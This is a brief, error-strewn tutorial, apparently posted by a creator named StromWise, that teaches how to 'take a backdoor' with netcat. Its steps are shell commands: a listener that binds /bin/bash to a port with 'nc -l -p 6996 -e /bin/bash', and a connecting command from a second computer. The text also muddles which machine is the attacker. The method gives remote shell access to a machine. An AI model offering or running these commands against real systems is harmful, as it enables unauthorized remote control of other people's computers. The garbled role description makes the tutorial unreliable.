IN THIS TOTURIAL YOU WILL LEARN HOW TO TAKE A BACKDOOR OF USING NETCAT.


STEP 1:  sudo apt-get install netcat

STEP 2:  on terminal one in kali type 

STEP 3:  nc -l -p 6996 -e /bin/bash (6996=port number you want to start listening)

STEP 4:  on the other computer terminal type 

STEP 5:  nc 192.168.0.? 6996 (ip address of the attcker machine and the port number on which attacker is listening)

STEP 5:  this will create a backdoor in kali machine and you will be able to use kali machine in the other comuter terminal.






____________________________________________________________________________________________________________________________________________
▶ Name: StromWise

▶ Role: Creator

▶ Location: Unknown

▶ GitHub: https://github.com/stromwise 

▶ Instagram: https://www.instagram.com/stromwise/ 

▶ Facebook: https://www.facebook.com/profile.php?id=100093706328777

▶ Youtube: https://www.youtube.com/channel/UC-tafc0TqgZNnQio8Gj-hjg 

▶ Twitter: https://twitter.com/StromWise 
____________________________________________________________________________________________________________________________________________


